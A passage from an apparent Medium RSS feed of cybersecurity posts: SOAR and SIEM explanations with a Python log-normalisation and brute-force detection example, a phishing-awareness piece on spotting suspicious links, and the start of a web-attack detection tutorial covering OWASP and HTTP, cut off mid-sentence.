(such as firewalls, SIEM, EDR, threat intelligence), centralizing their data and allowing them to work together in concert. This gives a unified view and enables more efficient operations.</li><li>Automation: Takes over repetitive, manual security tasks (e.g., gathering alerts, scanning vulnerabilities, running queries, enriching threat data) and automates well-defined workflows. 
This reduces human errors, frees up analyst time, and speeds response.</li><li>Response: Coordinates, manages, and standardizes how security teams respond to incidents. SOAR includes incident response playbooks — predefined, automated sequences of actions triggered by certain types of security events.</li></ul><h3>Core Components of SOAR</h3><ul><li>Security Orchestration: Integrates diverse security and IT tools for centralized data and workflows.</li><li>Security Automation: Automates repetitive and time-consuming activities (e.g., triage, enrichment).</li><li>Incident Response: Standardizes and automates the response, escalation, and remediation of threats.</li><li>Threat Intelligence: Aggregates and correlates real-time threat intelligence with internal data.</li><li>Playbooks: Step-by-step automated workflows for common incidents (like phishing or malware).</li><li>Case Management: Documents, tracks, and manages incidents from detection to resolution.</li></ul><h3>How SOAR Works (Typical Workflow)</h3><ol><li>Detection: SOAR ingests alerts and logs from multiple sources.</li><li>Triage: Automatically analyzes, prioritizes, and validates alerts — reducing false positives.</li><li>Enrichment: Pulls contextual information from internal and external intelligence sources to add details to incidents.</li><li>Response: Executes automated or semi-automated playbooks (e.g., quarantining devices, blocking IPs, alerting users).</li><li>Escalation: If automation cannot fully resolve, escalates incidents to analysts with all gathered evidence.</li><li>Case Management &amp; Reporting: Documents the incident lifecycle for compliance and learning.</li></ol><h3>Why Use SOAR?</h3><ul><li>Faster Incident Response: Automates alert triage and routine security tasks — cutting response times from hours to minutes.</li><li>Consistency &amp; Standardization: Predefined playbooks ensure every incident is handled according to best practices.</li><li>Better Use of Resources: Frees up skilled analysts for 
higher-level investigations and strategic work.</li><li>Reduced Risk and Human Error: Automated processes limit variability and mistakes during incident response.</li><li>Centralization: Brings together data, tools, and workflows in one platform for better collaboration and visibility.</li></ul><h3>Common SOAR Use Cases</h3><ul><li>Phishing Detection &amp; Response: Automatically analyzes suspicious emails, extracts indicators, blocks malicious senders, and isolates endpoints.</li><li>Automated Vulnerability Management: Continuously scans, prioritizes, and remediates known vulnerabilities across the environment.</li><li>Threat Hunting: Correlates and analyzes logs/intelligence to spot emerging threats proactively.</li><li>Case Management: Tracks the full lifecycle of incidents for compliance and forensics.</li><li>Threat Intelligence Integration: Aggregates, correlates, and operationalizes threat data from multiple sources.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/909/1*JsFq-9Cy_rtft3nk8AxryQ.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/897/1*FkWCaXVt50wx6YhG6ZKivQ.png" /></figure><h3>SIEM: Security Information and Event Management</h3><p>SIEM stands for Security Information and Event Management. 
It is a platform or software solution that collects, aggregates, analyzes, and manages security-related data from multiple sources within an organization’s IT infrastructure, offering a comprehensive and unified view of security across the organization.</p><h3>What Does SIEM Do?</h3><ul><li>Log Collection &amp; Aggregation: SIEM collects log and event data from various sources such as operating systems, servers, applications, firewalls, endpoint devices, databases, network equipment, and cloud environments.</li><li>Normalization &amp; Correlation: The system normalizes all this disparate data into a common format, then uses powerful analytics and correlation rules to connect related events and detect suspicious activities or patterns that might indicate an attack.</li><li>Real-Time Monitoring &amp; Alerting: SIEM provides real-time security monitoring, continuously analyzing incoming data for anomalies, threats, or compliance issues. When something suspicious is detected, the system generates alerts, often with prioritization based on severity.</li><li>Incident Investigation &amp; Forensics: Security teams can investigate incidents using SIEM dashboards, which provide tools for searching, filtering, and visualizing data to understand the scope and timeline of an attack.</li><li>Automation &amp; Response (Integration with SOAR): More advanced SIEMs can feed into or integrate with Security Orchestration, Automation, and Response (SOAR) platforms to automate responses or trigger predefined playbooks.</li><li>Regulatory Compliance: SIEM helps with compliance by producing required audit trails and reports for standards like PCI DSS, HIPAA, GDPR, and more.</li></ul><h3>How SIEM Works: Main Steps</h3><ol><li>Data Collection: Deploy agents or connectors to collect log and event data from across the IT environment.</li><li>Data Aggregation &amp; Storage: All data is centralized, typically in a dedicated SIEM server or cloud-based storage for scalability and 
retention.</li><li>Event Correlation &amp; Analysis: Rules, machine learning, and behavioral analytics are used to identify abnormal or malicious patterns across data sources.</li><li>Alerting: High-priority alerts are generated for analysts based on defined policies and analytics results.</li><li>Investigation: Analysts use SIEM’s search and visualization tools to further investigate incidents and determine the root cause.</li><li>Reporting &amp; Compliance: Regular or ad-hoc reports can be generated for compliance, forensics, or management.</li></ol><h3>Key Benefits of SIEM</h3><ul><li>Centralized Visibility: View all security events from one place, enhancing situational awareness.</li><li>Improved Threat Detection: Discover threats that would not be apparent from isolated events.</li><li>Incident Response: Increase the speed and accuracy of response to incidents by providing rich contextual data.</li><li>Compliance Aid: Automate log management and reporting for regulatory standards.</li><li>Advanced Analytics: Use user and entity behavior analytics (UEBA), threat intelligence, and sometimes AI to detect sophisticated threats.</li></ul><h3>Modern SIEM Features</h3><ul><li>Integration with cloud and on-prem systems</li><li>User and Entity Behavior Analytics (UEBA)</li><li>SOAR (Security Orchestration, Automation, and Response) capabilities</li><li>Customizable dashboards and reports</li><li>Scalable data storage and retention for historical analysis</li></ul><h3>Example SIEM Products</h3><p>Some major commercial and open source SIEM solutions include:</p><ul><li>Splunk</li><li>IBM QRadar</li><li>Microsoft Sentinel</li><li>ArcSight</li><li>Elastic SIEM</li></ul><p>In summary, SIEM is foundational in modern cybersecurity operations, enabling organizations to detect, investigate, and respond to abnormal activities or attacks before they do significant damage.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/942/1*pNI6KUXAFkd-3hFRvJyKHQ.png" 
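/></figure><p>The collection, normalization and correlation steps described above are easiest to see with concrete data. The block below is an added example and not any product's code: three constructed log formats (sshd syslog, Windows Security events as a JSON forwarder ships them, and a FortiGate-style key=value traffic log whose field set is approximate) are parsed into one schema, sorted, and run through a single correlation rule: a burst of failed logons from one source address followed by a success from the same address within a window, on any source, with the firewall destinations that address touched attached as context. Hosts, addresses, the attacker address 198.51.100.7 (TEST-NET) and the year assumed for the syslog timestamps are all constructed.</p>

```python
"""Normalise three constructed log formats into one schema and run a correlation rule over the result."""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

SYSLOG = [  # Linux sshd via syslog (no year in the timestamp)
    "Jun 22 09:00:01 web01 sshd[4121]: Failed password for invalid user admin from 198.51.100.7 port 51234 ssh2",
    "Jun 22 09:00:03 web01 sshd[4121]: Failed password for root from 198.51.100.7 port 51235 ssh2",
    "Jun 22 09:00:05 web01 sshd[4121]: Failed password for root from 198.51.100.7 port 51236 ssh2",
    "Jun 22 09:00:09 web01 sshd[4122]: Accepted password for root from 198.51.100.7 port 51240 ssh2",
    "Jun 22 09:30:00 web01 sshd[4200]: Accepted publickey for deploy from 10.0.0.9 port 40000 ssh2",
]
WINDOWS = [  # Windows Security events as a JSON forwarder ships them (4625 = failure, 4624 = success)
    json.dumps({"TimeCreated": "2024-06-22T09:10:00Z", "Computer": "SRV-FILE01", "EventID": 4625,
                "TargetUserName": "jdoe", "IpAddress": "198.51.100.7", "LogonType": 10}),
    json.dumps({"TimeCreated": "2024-06-22T09:10:02Z", "Computer": "SRV-FILE01", "EventID": 4625,
                "TargetUserName": "jdoe", "IpAddress": "198.51.100.7", "LogonType": 10}),
    json.dumps({"TimeCreated": "2024-06-22T09:10:04Z", "Computer": "SRV-FILE01", "EventID": 4625,
                "TargetUserName": "jdoe", "IpAddress": "198.51.100.7", "LogonType": 10}),
    json.dumps({"TimeCreated": "2024-06-22T09:10:30Z", "Computer": "SRV-FILE01", "EventID": 4624,
                "TargetUserName": "jdoe", "IpAddress": "198.51.100.7", "LogonType": 10}),
    json.dumps({"TimeCreated": "2024-06-22T09:12:00Z", "Computer": "SRV-FILE01", "EventID": 4624,
                "TargetUserName": "asmith", "IpAddress": "10.0.0.23", "LogonType": 10}),
]
FORTIGATE = [  # FortiGate-style key=value traffic log; the field set is approximate and constructed
    'date=2024-06-22 time=08:59:50 devname="FGT-EDGE" type="traffic" srcip=198.51.100.7 dstip=10.0.0.5 dstport=22 action="accept"',
    'date=2024-06-22 time=09:09:55 devname="FGT-EDGE" type="traffic" srcip=198.51.100.7 dstip=10.0.0.8 dstport=3389 action="accept"',
    'date=2024-06-22 time=09:20:00 devname="FGT-EDGE" type="traffic" srcip=198.51.100.7 dstip=10.0.0.9 dstport=445 action="deny"',
]

SYSLOG_RE = re.compile(r"^(\w{3} +\d{1,2} \d\d:\d\d:\d\d) (\S+) sshd\[\d+\]: (Failed|Accepted) \S+ for (?:invalid user )?(\S+) from (\S+) port")
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
SYSLOG_YEAR = 2024  # syslog omits the year; assume the year of the collection window


def parse_syslog(line):
    """sshd auth lines -> common schema; anything else from syslog is dropped here."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    when = datetime.strptime(f"{SYSLOG_YEAR} {m.group(1)}", "%Y %b %d %H:%M:%S")
    return {"ts": when, "source": "sshd", "host": m.group(2), "user": m.group(4), "src_ip": m.group(5),
            "event": "auth_success" if m.group(3) == "Accepted" else "auth_failure"}


def parse_windows(line):
    """Security 4624/4625 -> common schema; other event IDs are dropped."""
    e = json.loads(line)
    kind = {4624: "auth_success", 4625: "auth_failure"}.get(e["EventID"])
    if kind is None:
        return None
    return {"ts": datetime.strptime(e["TimeCreated"], "%Y-%m-%dT%H:%M:%SZ"), "source": "windows",
            "host": e["Computer"], "user": e["TargetUserName"], "src_ip": e["IpAddress"], "event": kind}


def parse_fortigate(line):
    """key=value traffic records -> common schema, with the destination as the host."""
    kv = {k: v.strip('"') for k, v in KV_RE.findall(line)}
    if kv.get("type") != "traffic":
        return None
    return {"ts": datetime.strptime(kv["date"] + " " + kv["time"], "%Y-%m-%d %H:%M:%S"), "source": "fortigate",
            "host": kv["dstip"], "user": None, "src_ip": kv["srcip"], "event": "conn_" + kv["action"]}


def normalise(syslog=SYSLOG, windows=WINDOWS, fortigate=FORTIGATE):
    """Collect and normalise: every source ends up in the same schema, ordered by time."""
    parsed = [parse_syslog(l) for l in syslog] + [parse_windows(l) for l in windows] + [parse_fortigate(l) for l in fortigate]
    return sorted((e for e in parsed if e), key=lambda e: e["ts"])


def brute_force_then_success(events, threshold=3, window=timedelta(minutes=5)):
    """Correlation rule: at least `threshold` failed logons from one source IP, then a success from the
    same IP within `window`, on any source. Firewall destinations seen from that IP are attached as context."""
    failures = defaultdict(list)
    alerts = []
    for e in events:
        if e["event"] == "auth_failure":
            failures[e["src_ip"]].append(e["ts"])
        elif e["event"] == "auth_success":
            recent = [t for t in failures[e["src_ip"]] if e["ts"] - t <= window]
            if len(recent) >= threshold:
                reached = sorted({x["host"] for x in events if x["src_ip"] == e["src_ip"] and x["event"].startswith("conn_")})
                alerts.append({"ts": e["ts"], "src_ip": e["src_ip"], "user": e["user"], "host": e["host"],
                               "source": e["source"], "failures": len(recent), "firewall_destinations": reached})
                failures[e["src_ip"]].clear()  # one alert per burst
    return alerts
```

<p>The point of normalizing first is that the rule is written once against the common schema and fires on SSH and RDP alike; the threshold and window are the tunables an analyst adjusts per environment, and the firewall context is what a SIEM adds that a single log source cannot.</p><figure><img alt="" 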
/></figure><h3>SIEM Compliance:</h3><p>SIEM Compliance refers to the process by which an organization’s Security Information and Event Management (SIEM) system is configured and managed to meet various regulatory and industry standards related to data protection, monitoring, logging, incident response, and reporting. It ensures that the organization’s security monitoring practices comply with legal and sector-specific requirements such as GDPR, HIPAA, PCI DSS, SOX, FISMA, and others.</p><p>Key aspects of SIEM Compliance include:</p><ul><li>Monitoring and Logging: Collecting and securely storing logs and security event data from diverse IT components (servers, firewalls, endpoints, applications) in a way that meets regulatory standards for integrity and retention.</li><li>Data Masking and Protection: Configuring SIEM to mask or protect sensitive information (like Social Security Numbers or personal health data) while still allowing for effective monitoring.</li><li>Real-Time Monitoring and Incident Detection: Setting up continuous, real-time analysis to detect security incidents promptly, as many regulations require timely threat detection and response.</li><li>Incident Response and Reporting: Automating the process of responding to and reporting security breaches, often within strict timelines (e.g., breach notification within 72 hours under GDPR).</li><li>Audit Trails and Compliance Reporting: Maintaining detailed logs of security events and activities to provide evidence for audits and regulatory compliance, supported by automated reporting tools.</li><li>Alignment with Multiple Regulations: Customizing SIEM configurations to align with the unique requirements of the various regulations an organization must comply with, which can vary by industry and geography.</li><li>Integration and Automation: Enhancing SIEM for compliance by integrating with other security tools (like endpoint detection and vulnerability management) and automating compliance workflows to reduce 
human error and improve efficiency.</li></ul><p>The goal of SIEM Compliance is not just to check regulatory boxes but to strengthen overall cybersecurity posture by ensuring continuous monitoring, timely incident management, and comprehensive documentation for audits and legal scrutiny.</p><p>In practice, organizations achieve SIEM Compliance by tailoring their SIEM platforms to meet specific regulatory frameworks, automating compliance monitoring and reporting, conducting regular audits, and integrating SIEM with broader security infrastructure to maintain a holistic security and compliance strategy.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/968/1*Xq3nfHv7z4-rAZcn3qx4Dg.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/898/1*6jaIKmvtj_8syqU06H5KIg.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/944/1*hRCsuFXb3OocmJfTZOgAzw.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/955/1*xD35wxxNhh_4lg8DMYUZEA.png" /></figure><h3>SD-WAN:</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/904/1*WjQfjpYIRYmArzuAVBVEMA.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/885/1*9TfhgjwQIPHQMmZxk-wOMQ.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/918/1*skfY48PcBDBciFtAiBzz6g.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/943/1*3RXWAi22Wx_OW97B7JnNjQ.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/701/1*_am4_r_0H-3Q3HBGfX0QOw.png" /></figure><h3>ZTNA:Zero Trust Network Access(ZTNA)</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/940/1*F9Y6bb31XRP-A3LM2Vdd0Q.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/946/1*OfgTZL7GOZD2Qhr5I-AHNQ.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/940/1*OXYb9L1WQA2dnDgMEqj-yg.png" /></figure><figure><img alt="" 
src="https://cdn-images-1.medium.com/max/943/1*_bBN_WtOjNfyTtfm44-E6g.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/985/1*Sfp2b7gGrNOZk7NKBQEbzA.png" /></figure><h3>Cloud Security:</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/827/1*m3AI706PteB5zjk5E6S7Jg.png" /></figure><h3>SASE: Secure access service edge</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/704/1*5u_HcYkcrh_1Y3IURqhqIg.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/695/1*E3CCMFEIW9VM7lb-FN1XdQ.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/1*sO9Zx2Gg4o8XGc7Ge3zbeQ.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/690/1*P86Ou7_BG8mz6brsVl275g.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/689/1*Wlrr28nRu6TKlniBW1BWWw.png" /></figure>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Understanding Suspicious Links & Their Threats]]></title>
            <link>https://medium.com/@shiblysadik/understanding-suspicious-links-their-threats-b54845a86f9e?source=rss-79235f7f39d1------2</link>
            <guid isPermaLink="false">https://medium.com/p/b54845a86f9e</guid>
            <category><![CDATA[soc]]></category>
            <category><![CDATA[networking]]></category>
            <category><![CDATA[digital-forensics]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[phishing]]></category>
            <dc:creator><![CDATA[Shibly Sadik]]></dc:creator>
            <pubDate>Sun, 09 Mar 2025 17:50:44 GMT</pubDate>
            <atom:updated>2025-03-09T17:50:44.240Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/730/1*BoK-mTj7gapEB8iKcbm2xw.jpeg" /></figure><h3><strong>Introduction</strong></h3><h4>Overview of Cyber Threats Related to Suspicious Links</h4><p>Suspicious links are one of the most common entry points for cyberattacks. Clicking on a malicious link can lead to:<br>✔ <strong>Phishing</strong> — Stealing user credentials.</p><p>Common Types of Phishing Attacks:</p><ul><li><strong>Email Phishing:</strong> The most common type, involving fraudulent emails that appear legitimate.</li><li><strong>Spear Phishing:</strong> Targeted attacks that use personalized information about the victim to increase the likelihood of success.</li><li><strong>Whaling:</strong> Phishing attacks that target high-profile individuals within an organization.</li><li><strong>Business Email Compromise (BEC):</strong> Phishing attacks that target business email accounts to steal money or sensitive information.</li><li><strong>Smishing:</strong> Phishing attacks conducted via SMS messages.</li><li><strong>Vishing:</strong> Phishing attacks conducted via phone calls.</li><li><strong>Clone Phishing:</strong> Attackers mimic legitimate emails and modify them to include malicious links or attachments.</li></ul><p>✔ <strong>Malware Infection</strong> — Downloading viruses, ransomware, or spyware.</p><p><strong>Common Types of Malware:</strong></p><ul><li><strong>Viruses:</strong> Malware that attaches to other programs and replicates itself, potentially damaging files or systems.</li><li><strong>Worms:</strong> Self-replicating malware that spreads rapidly across networks without needing to attach to other files.</li><li><strong>Trojan Horses:</strong> Malware disguised as legitimate software, which can install other malicious programs or steal data.</li><li><strong>Spyware:</strong> Software that secretly monitors and collects information about a user&#39;s activities without their 
knowledge.</li><li><strong>Ransomware:</strong> Malware that encrypts a user&#39;s files and demands payment for their release.</li><li><strong>Adware:</strong> Software that displays unwanted advertisements, potentially slowing down a device and exposing users to malicious links.</li></ul><p>✔ <strong>Data Breaches</strong> — Extracting personal or financial data.</p><p>Common Causes of Data Breaches:</p><ul><li><strong>Insider Threats:</strong> Misuse of privileged access by employees or insiders.</li><li><strong>Weak Passwords:</strong> Easily guessable or stolen passwords.</li><li><strong>Unpatched Applications:</strong> Outdated software with known vulnerabilities.</li><li><strong>Malware:</strong> Malicious software that can infect systems and steal data.</li><li><strong>Social Engineering:</strong> Tricking individuals into revealing sensitive information.</li><li><strong>Physical Attacks:</strong> Physical theft or damage of devices containing data.</li></ul><p>✔ <strong>Drive-By Downloads</strong> — Exploiting browser vulnerabilities so that merely visiting a page installs malware, without the user clicking anything further.</p><h4>Real-World Examples of Phishing &amp; Malware Attacks</h4><ol><li><strong>Google Docs Phishing Attack (2017)</strong> — A link to a fake “Google Docs” application tricked users into granting a malicious OAuth app access to their Gmail accounts; no password was typed, so the usual credential-theft warning signs were absent.</li><li><strong>Twitter Bitcoin Scam (2020)</strong> — Attackers who had taken over high-profile accounts used them to post scam links.</li><li><strong>WannaCry Ransomware (2017)</strong> — Infected over 200,000 devices. Note that it spread as a worm through the EternalBlue SMB exploit rather than through links, a reminder that a link is only one of several delivery paths for malware.</li></ol><h3>Identifying Suspicious Links</h3><h3>Common Signs of a Malicious Link</h3><p>🔹 <strong>Shortened URLs</strong> (e.g., bit.ly, tinyurl.com) — Can hide the actual destination; expand them before visiting.<br>🔹 <strong>Misspellings &amp; Homoglyphs</strong> — e.g., g00gle.com instead of google.com, or a Cyrillic letter that looks identical to a Latin one.<br>🔹 <strong>Unexpected Domains</strong> – Fake subdomains like paypal.secure-login.com, where the registered domain is secure-login.com, not paypal.com; read the domain from the right.<br>🔹 <strong>HTTP vs. 
HTTPS</strong> – Legitimate sites use HTTPS, so plain HTTP is a red flag, but most phishing sites also use HTTPS today: the padlock proves only that the connection is encrypted, not that the site is genuine.</p><h3>Tools to Check Link Safety</h3><p><strong>VirusTotal</strong> — <a href="https://www.virustotal.com">www.virustotal.com</a><br> <strong>URLVoid</strong> — <a href="https://www.urlvoid.com">www.urlvoid.com</a><br> <strong>Google Safe Browsing</strong> — transparencyreport.google.com/safe-browsing</p><h3>Hands-On Activity: Analyzing Real &amp; Fake URLs</h3><h4>Task 1: Spot the Fake URL</h4><p>Below are three URLs — identify which ones are malicious:</p><ol><li>https://secure-paypal.com/verify</li><li>https://www.paypal.com/secure-login</li><li>http://paypa1.com/reset-password</li></ol><p>Correct Answer: <strong>1 &amp; 3 are malicious.</strong></p><ul><li>secure-paypal.com is <strong>not</strong> the official PayPal site; the registered domain is secure-paypal.com, and attaching a brand name to an unrelated domain is a common lure.</li><li>paypa1.com uses <strong>&quot;1&quot; instead of &quot;l&quot;</strong>, a classic phishing trick.</li><li>www.paypal.com/secure-login is on the genuine domain; the path after the domain does not change who owns the site.</li></ul><h4>Task 2: Check a Suspicious Link in VirusTotal</h4><ol><li>Go to <a href="https://www.virustotal.com">VirusTotal</a>.</li><li>Copy the suspicious link and paste it into the search bar.</li><li>Analyze the results — several engines flagging the URL is a strong signal, while a clean result is not proof of safety, since newly registered phishing domains are often not yet listed.</li></ol><p>Keep in mind that URLs submitted to VirusTotal are shared with other users, so do not submit links that contain session tokens or other sensitive data.</p><h3>How Cybercriminals Use Suspicious Links</h3><h3>Phishing Techniques</h3><p><strong>Email Phishing</strong> — Fake invoices, password reset emails.<br> <strong>SMS Phishing (Smishing)</strong> — Fake OTP requests, banking scams.<br> <strong>Social Media Scams</strong> — Fake giveaways, job scams.</p><h3>Drive-By Downloads &amp; Watering Hole Attacks</h3><p><strong>Drive-By Downloads</strong> — Visiting a page that carries a malicious script silently downloads and runs malware by exploiting a browser or plugin vulnerability.<br><strong>Watering Hole Attack</strong> — Attackers compromise a website the target group is known to visit and use it to infect those visitors.</p><h3>Case Study Discussion: Recent Cyber Attacks Involving Links</h3><p><strong>Attack: 2023 Microsoft Teams Phishing 
Scam</strong><br> 🔹 Cybercriminals sent fake meeting links via Microsoft Teams chat.<br> 🔹 Victims were redirected to a fake login page to steal credentials.<br> 🔹 <strong>Lesson:</strong> Always verify links before clicking, even in work emails.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dEcaWsZudPZoBcQgp2ryUw.png" /></figure>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Detecting Web Attack]]></title>
            <link>https://medium.com/@shiblysadik/detecting-web-attack-from-letsdefend-1f1a1afac3bf?source=rss-79235f7f39d1------2</link>
            <guid isPermaLink="false">https://medium.com/p/1f1a1afac3bf</guid>
            <category><![CDATA[sql-injection]]></category>
            <category><![CDATA[idor]]></category>
            <category><![CDATA[remote-file-inclusion]]></category>
            <category><![CDATA[owasp-top-10]]></category>
            <category><![CDATA[web-attack]]></category>
            <dc:creator><![CDATA[Shibly Sadik]]></dc:creator>
            <pubDate>Fri, 12 Jan 2024 23:00:49 GMT</pubDate>
            <atom:updated>2024-01-12T23:02:50.105Z</atom:updated>
            <content:encoded><![CDATA[<h3><strong>Introduction</strong></h3><p>We have prepared the Web Attacks 101 training to provide a better understanding of cyber attacks (75% of which target web applications) and how to respond to these attacks.</p><h3>What are Web Attacks?</h3><p>Web applications are applications that provide services to users through a browser interface. Today web applications make up a large portion of internet usage. Sites such as Google, Facebook and YouTube (excluding their mobile applications) are actually web applications.</p><p>Because web applications are an organization&#39;s interface to the internet, attackers can exploit them to infiltrate devices, capture personal data or cause service outages, inflicting serious financial damage.</p><p>A study by Acunetix determined that 75% of all cyber attacks were performed at the web application level.</p><p>Below you will find some attack methods used to infiltrate web applications. We will address these methods in our “Web Attacks 101” course; we will explain what these methods are, how and why attackers use them and how we can detect such activities.</p><ul><li>SQL Injection</li><li>Cross Site Scripting</li><li>Command Injection</li><li>IDOR</li><li>RFI &amp; LFI</li><li>File Upload (Web Shell)</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/231/1*iCC3MQ6KgR_pNJ0SYWJksA.png" /></figure><h3>Why Detecting Web Attacks Is Important</h3><p>When you look at the daily life of an average person you will see that they use many web applications throughout the day. 
There are those who visit Spotify to listen to music, those who visit YouTube to watch videos or those who use social media.</p><p>It is no surprise that attackers choose web applications as a gateway for their attacks: every institution has web applications, they usually hold critical data, and modern applications are highly complex with numerous attack vectors. A study conducted by Acunetix supports this idea.</p><blockquote><em>“Recent research shows that 75% of cyber attacks are done at the web application level.” [1]</em></blockquote><p>If we examine the anatomy of an attack, we see that the best scenario is to prevent the attack in its first phase. For this reason, there are various security controls that aim to prevent and detect attacks on web applications (WAF, IPS, SIEM rules…).</p><p>It is crucial that a SOC analyst detects these web application based attacks, which are the preference of attackers, and takes precautions against them.</p><p><strong>Reference</strong></p><p>[1] <a href="https://www.acunetix.com/websitesecurity/web-application-attack/">https://www.acunetix.com/websitesecurity/web-application-attack/</a></p><h3>OWASP</h3><p>The Open Web Application Security Project (OWASP) is a nonprofit foundation that works to improve the security of software.[1]</p><p>It goes without saying that OWASP is one of the best resources for information about web application security.</p><h3>OWASP Top Ten</h3><p>OWASP publishes a list of the 10 web application security risks it considers most critical every few years. 
As of the writing of this article, the latest publication was in 2021.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/889/0*1TF3cOGKadokMev1.png" /></figure><p>The OWASP list published in 2021 contains these critical security risks:</p><ol><li>Broken Access Control</li><li>Cryptographic Failures</li><li>Injection</li><li>Insecure Design</li><li>Security Misconfiguration</li><li>Vulnerable and Outdated Components</li><li>Identification and Authentication Failures</li><li>Software and Data Integrity Failures</li><li>Security Logging and Monitoring Failures</li><li>Server-Side Request Forgery (SSRF)</li></ol><p>You can read the OWASP publication which contains the most critical security risks <a href="https://owasp.org/">here</a>.</p><p><strong>References</strong></p><p>[1] <a href="https://owasp.org/">https://owasp.org/</a></p><h3>How Web Applications Work</h3><p>In order to detect an anomaly we should first understand how the technology works. Applications use certain protocols to communicate accurately with each other. Web applications communicate via the Hyper-Text Transfer Protocol (HTTP). Let’s look into how HTTP works.</p><p>For a start, it’s important to know that HTTP sits on the 7th (application) layer of the OSI model. This means that lower-layer protocols such as Ethernet, IP, TCP and, for HTTPS, TLS (the successor of SSL) are in play before HTTP is.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/528/0*hxbCjArLlpJw8w3I.png" /></figure><p>HTTP communication takes place between the server and the client. First, the client requests a specific resource from the server. The server receives the HTTP Request, passes it through certain controls and processes, and sends an HTTP Response back to the client. 
The client’s device receives the response and displays the requested resource in an appropriate format.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/436/0*BBAtQ8FiBNCLR3Cv.png" /></figure><p>Let’s examine HTTP Requests and HTTP Responses in more detail.</p><h3>HTTP Requests</h3><p>An HTTP Request is used to retrieve a certain resource from a web server. This resource may be an HTML file, a video, JSON data, etc. The web server’s job is to process the received request and return the resource to the user.</p><p>There is a standard HTTP format, and all requests must comply with this format so web servers can understand the request. If the request is sent in a different format, the web server will not understand it and will return an error to the user, or the web server may fail to provide service at all (which is another attack type).</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/817/0*RwOmAnXNBTZr0gOY.png" /></figure><p>An HTTP Request consists of a request line, request headers and a request message body. The request line consists of the HTTP method and the resource requested from the web server. The request headers contain certain headers that the server will process. The request message body contains data that is intended to be sent to the server.</p><p>In the image above you see an example of an HTTP Request. Let’s examine this HTTP Request line by line.</p><ol><li>The GET method states that the resource “/” is requested from the server. Because there is no name, only the “/” symbol, the web server’s main page is requested.</li><li>Nowadays a single web server often hosts web applications belonging to more than one domain, so browsers use the “Host” header to say which domain the requested resource belongs to.</li><li>When a web application wants to store information on the client’s device, the client sends it back on later requests in a “Cookie” header. Cookies are generally used to store session information. 
Therefore, you do not have to re-enter your username and password every time you visit a web application that requires login.</li><li>The “Upgrade-Insecure-Requests” header states that the client prefers an encrypted (HTTPS) response.</li><li>There is information regarding the client’s browser and operating system under the “User-Agent” header. Web servers use this information to tailor HTTP Responses to the client. Some automated vulnerability scanners identify themselves in this header, which makes it useful for detection.</li><li>The type of data requested is found under the “Accept” header.</li><li>The encoding types that the client understands are found under the “Accept-Encoding” header. You can usually find compression algorithm names under this header.</li><li>Under the “Accept-Language” header you can find the client’s language information. The web server uses this information to display the prepared content in the client’s language.</li><li>The “Connection” header shows how the HTTP connection will be handled. If “close” is found here, the TCP connection will be closed after the HTTP Response is received. If you see “keep-alive”, the connection will be kept open for further requests.</li><li>An empty line is put between the HTTP Request Headers and the HTTP Request Message Body to separate them.</li><li>Other data intended to be sent to the web application is found within the Request Message Body. If the HTTP POST method is used, the POST parameters can be found here.</li></ol><h3>HTTP Responses</h3><p>Once the web server receives an HTTP Request, it performs the required controls and processes and then sends the requested resource to the client. There is no uniform process here because there are numerous technologies and designs involved. The server may pull data from a database according to the requested resource, or it may process the incoming data. 
But the HTTP Response Message must reach the client after all the processing.</p><p>An HTTP Response Message contains a Status Line, Response Headers, and a Response Body. The Status Line contains the HTTP protocol version and the status code (such as 200: OK). Headers used for numerous purposes are found within the Response Headers. Data related to the requested resource is found within the Response Body.</p><p>If a web page was requested, there will usually be HTML code in the Response Body. When the client receives the HTML code, the web browser processes it and displays the web page.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/581/0*NTNyXZ5OXFUb_7uo.png" /></figure><p>You can see an HTTP Response in the image above. Let’s examine an HTTP Response based on this image.</p><p><strong>Status Line</strong></p><p>There is information about the HTTP version and the HTTP response status code in the Status Line. The status code describes the outcome of the request. There are many HTTP response status codes, but they can be summarized as follows:</p><p>● <strong>100–199</strong>: Informational responses</p><p>● <strong>200–299</strong>: Successful responses</p><p>● <strong>300–399</strong>: Redirection messages</p><p>● <strong>400–499</strong>: Client error responses</p><p>● <strong>500–599</strong>: Server error responses</p><p><strong>Response Headers</strong></p><p>Here are some HTTP Response Headers that you may come across frequently:</p><p>● <strong>Date</strong>: The time at which the server sent the HTTP Response to the client.</p><p>● <strong>Connection</strong>: States how the connection will be handled, just like the header of the same name in the HTTP 